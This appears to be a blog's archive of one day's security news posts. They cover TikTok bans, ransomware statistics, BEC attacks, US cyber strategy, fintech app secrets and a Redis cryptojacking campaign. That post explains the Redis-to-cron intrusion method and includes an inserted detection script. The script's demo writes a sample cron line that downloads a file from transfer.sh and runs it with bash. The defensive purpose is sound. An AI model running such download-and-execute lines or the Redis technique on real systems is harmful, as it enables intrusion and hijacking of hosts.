Archive for March 2, 2023

TikTok Banned By Four Provinces

Posted in Commentary with tags on March 2, 2023 by itnerd

First TikTok was banned on Canadian government devices by the Canadian government. Now TikTok has been banned on the devices of four provinces in Canada. Those provinces are:

  • Saskatchewan
  • Nova Scotia 
  • PEI
  • Newfoundland and Labrador

It should be noted that Alberta and Quebec already have a TikTok ban in place. And I think it’s safe to say that other provinces and territories in Canada will be announcing similar bans. This is going to increase the pressure on ByteDance, which is facing similar bans in other places. Not to mention that the Canadian Privacy Commissioner is investigating TikTok. One has to wonder at what point TikTok, or its Chinese Communist Party masters, will respond to this growing wave of bans on TikTok in Canada.

This will be interesting to watch.

BlackFog Releases Their State of Ransomware Report For February 2023

Posted in Commentary with tags on March 2, 2023 by itnerd

BlackFog has released the February 2023 State of Ransomware Report. BlackFog issues a monthly recap of the latest stats in ransomware attacks including prevalent threat actors, tactics, volume of attacks in varying countries and vertical sectors, rate of disclosed and undisclosed attacks compared to other months, and more. Please feel free to use this data in any articles, reports or research on ransomware attacks. 

Darren Williams, CEO and Founder, BlackFog, has provided perspectives on the state of ransomware for February 2023:

“For the second month of 2023, we have seen new records broken, with February seeing a new high of 40 victims, a 43% increase from 2022. This month we continue to collect unreported data, and this month we see 543% of attacks remain unreported, a 65% increase over January.

Sector-wise we saw education continue to dominate with 17 victims, and healthcare and government closely behind with 15 each. Government attacks saw the biggest increase in February, with a 150% increase since January, while Healthcare and Education saw 88% and 70% increases respectively.

Data exfiltration continues as the main weapon of choice for ransomware and is used in 88% of all attacks. This month we also saw an increased number of attacks originating from China, which now represents 38% of all attacks, up from 36% in January. Russia remains stable at 9%.

Finally, in terms of variants, as we predicted in January we saw a dramatic increase in attacks from LockBit, as victims from previous months begin to disclose attacks. We expect this pattern to continue as unreported attacks continue to be dominated by LockBit, which is at 48%, while disclosed is at 24.3%. BlackCat also increased to 24.3%, although the growth in unreported remains significantly lower.”

I’d spend some time reading this report as it provides a lot of insight as to what threats you really need to worry about.

BEC 2.0 Attack Uses Conversation Hijacking in Legit Email Threads of Compromised Accounts

Posted in Commentary with tags on March 2, 2023 by itnerd

Avanan, A Check Point Software Company, has published a new report on tracking the rise and continuous evolution of Business Email Compromise (BEC) attacks as researchers observe different variants.

According to Jeremy Fuchs, Cybersecurity Researcher/Analyst at Avanan, there’s BEC 1.0, where hackers pose as your boss and ask you to get a gift card; BEC 2.0, leveraging compromised accounts at the organization to unleash attacks within legit emails; and BEC 3.0, a third tier researchers are seeing develop.

Conversation Hijacking: In this attack brief, the hacker takes over an account and inserts themselves into a legitimate conversation, posing as the employee whose account has been compromised (i.e., someone took over my account and started replying as me; the end user would have no way of knowing).

The research is live here: https://www.avanan.com/blog/business-email-compromise-scam-tries-to-trick-company-into-payment

The National Cyber Strategy Is Out… Here’s Why It Matters

Posted in Commentary with tags on March 2, 2023 by itnerd

The Biden Administration has released the National Cybersecurity Strategy. And it has some interesting details:

The strategy – shaped by major hacking incidents that threatened key public services in the first year of the Biden administration – embraces the US government’s regulatory and purchasing power to force companies that are critical to economic and national security to raise their cyber defenses.

It reflects a widely held belief in the US government that market forces have failed to keep the nation safe from cybercriminals and an array of foreign governments such as Russia and China. 

“We ask individuals, small businesses and local government to shoulder a significant burden for defending us all. This isn’t just unfair, it’s ineffective,” Acting National Cyber Director Kemba Walden told reporters Wednesday. “This strategy asks more of industry, but also commits more from the government.”

The strategy is a policy document and not law, but it could shape corporate behavior for years to come as firms compete for billions of dollars in federal contracts that increasingly require a minimum set of cybersecurity defenses. And the White House says it wants to work with Congress to develop legislation that holds software makers liable when their products and services don’t provide adequate protections from sabotage.

Edgard Capdevielle, CEO of ICS/OT cybersecurity vendor Nozomi Networks, had this to say:

“The National Cyber Strategy’s non-voluntary requirements for critical infrastructure to increase cybersecurity posture will be met with varying responses from CEOs and Boards alike. While the impetus for a better cyber posture to defend against potential nation-state adversaries is wise and necessary, the ability for these entities to identify the budget and personnel to manage these pieces is going to be difficult. As it is for most companies in this macroeconomic climate. We look forward to working with our U.S. critical infrastructure partners, just as we have with their international counterparts, to meet changing regulatory guidelines with the best defenses and visibility possible.” 

The nearly 40-page document provides a roadmap for new laws and regulations over the next few years aimed at helping the United States prepare for and fight emerging cyber threats. Hopefully this is effective at stopping the sort of large scale attacks that we’ve seen over the last few years.

UPDATE: Craig Burland, CISO of Inversion6, had this to say:

This strategy continues a trend of a more activist federal government pushing cybersecurity forward. Within the last 12 months or so, you can see increased announcements and initiatives from CISA, as an example, that foreshadowed something broader. The pillars build on existing ideas and cyber principles – defend critical infrastructure, support the nation’s collective defense, and embrace secure by design. That last item has been discussed in solution development forums for years, but hasn’t become a norm for producers.

The real test will come in the pronouncements that follow. A strategy by itself won’t compel companies to change how they invest. This strategy is a shot across the bow that signals tougher standards are coming. How those manifest themselves will be fascinating to watch. Will the administration try to enact laws with associated fines? Will they pressure industry groups to do self-improvement? Can they become a catalyst for real change and help get cybersecurity past the tipping point where best practices are the only accepted practices? Hopefully, one way or another, they can spur real change and make all of our lives safer.

Novel Cryptojacking Malware Campaign Exploits Insecure Redis Deployment Using File Hosting Service

Posted in Commentary with tags on March 2, 2023 by itnerd

Matt Muir, Threat Intelligence Researcher at Cado Security, recently discovered a novel cryptojacking campaign targeting insecure deployments of Redis that leverages transfer.sh, a free, open-source command line file transfer service.

This research has been published and analyzes the initial access achieved by an exploit that is a favourite of the threat actor groups WatchDog and TeamTNT, why this is a novel technique (explored through its primary payload: memory configuration, actions on objective, and propagation), and IoCs.

Although reports of this service being used for malware distribution have been rare, Cado Labs telemetry suggests that this is changing as researchers are seeing an uptick since the beginning of this year.

You can read the research here. But I also have a Q&A with Matt Muir, Threat Intelligence Researcher at Cado Security:

  1. The attackers compromise insecure Redis instances (do you know how?)
  • Redis exposes an API endpoint that allows developers to interact with the data store via the redis-cli command line tool
  • In more recent versions, they introduced authentication for this API endpoint (ignoring requests from unauthenticated clients)
  • Despite this, Redis’ security documentation states that DBAs should avoid exposing this endpoint to the internet
  • If the API endpoint is exposed to the internet, and authentication isn’t configured (or available), it’s possible for an attacker to remotely connect to the data store using redis-cli
  • Attackers use tools like pnscan (such as in this campaign) to conduct mass scanning of the internet, looking for nodes with the Redis default port open
  • If they find such nodes, they attempt to connect to Redis in an opportunistic manner
  2. Write a cron job that will trigger the reading of a file (exploit?) that allows them to execute code
  • Once connected to the data store, it’s possible to write values to specific keys
  • One such value could be a string representing a cron job
  • It’s also possible to use redis-cli to save a version of the database to disk
  • Once a string with cron syntax is written to a key, you can then use redis-cli to set the working directory to a cron directory
  • Saving the contents of the database to disk saves a binary file (representing the database) with the cron job embedded as a string
  • Crond then parses the database file as if it were a plaintext file containing a cron job and registers the job
  • Execution is then determined by the syntax of the job
  • In this case, the job can be seen in the ‘command’ section of the first screenshot of the blog
  • It retrieves a script (analysis of which forms the bulk of the blog) from transfer.sh, saves it as .cmd and executes it via bash at an interval of every second minute
  3. The (same?) cron job executes every second minute and runs a cURL command to retrieve a payload from transfer.sh, which is saved as a .cmd file, which is executed and:
  • Correct, see above
  4. Prepares the targeted host for cryptomining (how “noisy” are these measures?)
  • This depends on the target system and how much monitoring is enabled
  • A lot of the host configuration would appear in audit daemon logs but these aren’t enabled by default
  • SELinux interaction appears in /var/log/avc.log (for some distros)
  • Configuration of drop_caches would be logged to /var/log/messages or /var/log/syslog depending on host settings
  5. Finally, the script retrieves the pnscan and XMRig binaries (also from transfer.sh?)
  • These tools are open source and are hosted on GitHub
  6. While XMRig starts mining, the script uses pnscan to find vulnerable Redis servers and propagate a copy of the script to them (Only Redis servers on the same network, or? Which weaknesses does it exploit to gain access to them and execute the script? How is the script delivered? Is this whole process automatic? If yes, could this be considered worm-like behavior?)
  • Propagation is conducted via the method described above
  • Pnscan is used for internet-wide scanning, so distribution is not limited to the local network
  • Which weaknesses does it exploit to gain access to them and execute the script?
    • Unauthenticated Redis file write, as mentioned above
  • How is the script delivered?
    • Using the unauthenticated Redis file write method to write a cron job
  • Is this whole process automatic? If yes, could this be considered worm-like behavior?
    • Yes and yes

When you say “Security professionals should be aware of [the trend of criminals using transfer.sh] and implement detections accordingly,” what do you specifically mean?

  • If you currently have a network-based detection for traffic to other suspicious file hosting domains (e.g. pastebin.com), supplement this detection with the domain transfer.sh
  • transfer.sh wasn’t previously known to host malware, now there’s evidence that it is being used to host malware
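An added detection example, written for this post and not part of the Cado research or this blog: it checks cron directories for the two host-side signals the Q&A above describes, a Redis RDB dump header sitting in a cron file and a cron entry that fetches from transfer.sh and executes the result. The cron directory list, the function names and the constructed sample files are assumptions of this example.

```python
import os
import re
import tempfile

# A Redis RDB dump starts with "REDIS" plus a four-digit version ("REDIS0009").
# Crond skips the binary parts and registers any line that parses as a cron
# entry, so this header inside a cron directory is a strong signal of the
# unauthenticated-Redis-to-cron trick described in the Q&A above.
RDB_MAGIC = re.compile(rb"^REDIS\d{4}")
# The file host named in the research, plus a generic download-then-execute
# shape (curl/wget ... transfer.sh ... bash/sh) for the cron line itself.
TRANSFER_SH = re.compile(rb"https?://transfer\.sh/\S+")
DOWNLOAD_EXEC = re.compile(rb"\b(?:curl|wget)\b.*?transfer\.sh.*?\b(?:bash|sh)\b", re.S)
# Assumed cron locations; adjust for the distribution being checked.
CRON_DIRS = ("/etc/cron.d", "/var/spool/cron", "/var/spool/cron/crontabs")

def scan_cron_bytes(data, path):
    """Return (finding, path) tuples for the raw contents of one cron file."""
    findings = []
    if RDB_MAGIC.match(data):
        findings.append(("rdb_header_in_cron_dir", path))
    if TRANSFER_SH.search(data):
        findings.append(("transfer_sh_url", path))
    if DOWNLOAD_EXEC.search(data):
        findings.append(("download_and_execute", path))
    return findings

def scan_cron_dirs(dirs=CRON_DIRS):
    """Scan every regular file in each cron directory that exists."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            if os.path.isfile(path):
                with open(path, "rb") as fh:
                    findings.extend(scan_cron_bytes(fh.read(), path))
    return findings

def demo():
    """Constructed sample: a benign crontab beside an RDB-shaped file with a cron entry."""
    tmp = tempfile.mkdtemp()
    with open(os.path.join(tmp, "backup"), "wb") as fh:
        fh.write(b"0 2 * * * root /usr/local/bin/backup.sh\n")
    # Constructed RDB header/trailer around a line shaped like the job the research
    # describes (fetch from transfer.sh every second minute, save as .cmd, run via
    # bash); the URL path is a placeholder, not a real indicator.
    with open(os.path.join(tmp, "root"), "wb") as fh:
        fh.write(b"REDIS0009\xfe\x00\n"
                 b"*/2 * * * * curl -fsSL https://transfer.sh/PLACEHOLDER/x -o /tmp/.cmd; bash /tmp/.cmd\n"
                 b"\xff")
    return sorted(name for name, _ in scan_cron_dirs([tmp]))
```

Run `scan_cron_dirs()` as root on a host to check its real cron directories; `demo()` only exercises the constructed samples.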

Study Finds That 92% of Google Play Store’s 650 Most Popular Fintech Apps Expose Exploitable Secrets

Posted in Commentary with tags on March 2, 2023 by itnerd

Ninety-two percent of the most popular banking and financial services apps on the Google Play Store contain easy-to-extract secrets (such as API keys), which could be used by cyber attackers in scripts and bots to steal data, devastating consumers and the institutions they trust.

The study “Mobile App Security Report – Exposing the Security Vulnerabilities of Top Finance Apps” summarizes the work of the Approov Mobile Threat Lab. The team downloaded, decoded and scanned the top 200 financial services apps in the U.S., U.K., France and Germany, investigating a total of 650 unique apps. 

Only 5% of the apps examined had good defenses against runtime attacks manipulating the device environment and only 4% were well protected against Man-in-the-Middle (MitM) attacks at run-time. As well as immediately exposing secrets, scans also indicated two critical runtime attack surfaces that could be used to steal API keys at runtime.

Other findings: 

  • None of the 650 apps “ticked all the boxes” in terms of the three attack surfaces investigated. All failed in at least one category.
  • Only four apps had runtime protection against channel MitM attacks and “man-in-the-device.” All were payment and transfer apps and none with such protections were in the U.S.
  • In general, apps deployed in Europe were better protected than apps available only in the U.S., for immediate secret exposure and runtime protections. 
  • Crypto apps were more likely to leak sensitive secrets as 36% immediately offered highly sensitive secrets when scanned. 
  • 18% of personal finance apps leaked sensitive information, possibly because they are less dependent on sensitive APIs.
  • For Man-in-the-Device attacks, traditional banks’ mobile apps are twice as likely to be well protected as those in other sectors, reflecting the use of packers and protectors to guard against run-time manipulation.

The report can be found here.

UPDATE: Rajiv Pimplaskar, CEO of Dispersive Holdings, Inc. had this comment:

“Cloud security is always a constant battle between convenient access and secure access. In the examples of the reports, the wide majority of the applications contained “pre-baked” API keys that provided access to certain “secured” public services just by the presence of the API key. Once compromised, the security of the API is completely out the window.

“API keys for accessing *any* public service should not last indefinitely and they should never come directly with a mobile or enterprise application install. The most secure way is requiring that the API keys be received after proper authentication (and most likely Multi Factor Authentication, MFA). In today’s day and age, MFA is not difficult to set up and while it isn’t perfect, it provides meaningful resistance to most hackers and malicious actors looking for low hanging fruit.

“Once the API key is obtained, accessing the service is still a potential waving flag for malicious actors. The transport mechanisms and source/destination addresses can become immediate targets.

“That’s why stealth networking and solutions can be truly innovative. Obfuscating and encrypting and protecting data in transit can provide the enhanced security from mobile endpoint all the way to cloud. Additionally, with a stealth networking solution, the ability for a malicious actor to set up a MITM attack is severely hindered. By removing “known” open endpoints, malicious actors can’t easily set up the MITM to try to intercept and capture/modify packets.”

Attack Breakout Time Drops To Just 84 Minutes

Posted in Commentary with tags on March 2, 2023 by itnerd

I have some bad news if you’re responsible for defending your organization against threat actors.

Attackers have reduced the average time required to move laterally through systems by 14% last year, down to just 84 minutes, according to a new report from CrowdStrike, giving defenders even less time to contain breaches after the initial breakout.

Increasing the difficulty for defenders, a full 71% of the attacks used valid credentials for access rather than malware, up from 62% in 2021, making detection by automated systems extremely difficult. Using “hands on keyboard” techniques makes it harder for traditional anti-malware tools to detect activity, according to CrowdStrike.

Like I said, this is bad news.

Ted Miracco, CEO of Approov Mobile Security, had this to say:

“It’s important to note that no single security measure can completely prevent all types of attacks, especially social engineering attacks. That said, mobile app attestation, runtime secrets protection, and RASP can all be highly effective measures in preventing credential access, SIM swapping, and MFA fatigue in mobile applications.

“Attestation techniques can help not only ensure that only genuine apps, and not tampered or cloned versions, are accessing APIs, it also uses the authorized application seamlessly as the second factor before accessing sensitive data. By verifying the integrity of the app at runtime, it both prevents attackers from injecting malicious code or accessing sensitive data. Runtime secrets protection can ensure that only valid app instances running in un-compromised environments can access the API keys and secrets stored in the cloud. This can prevent attackers from accessing these secrets even if they manage to gain control of the device. RASP can monitor, detect, and instantly block computer attacks, including new threats that were unforeseen during development. By continuously analyzing app behavior and detecting anomalies, RASP can prevent “interactive intrusions” and other types of attacks.

“It’s best to use a combination of security measures, including those mentioned above, along with other security best practices such as proper authentication and authorization, encryption, and regular security testing and updates.”

The fact that attacks are getting faster and faster to execute means that we all have to work much harder to stop organizations from being victims. And the approach outlined above can certainly help with that… If everyone adopts that approach.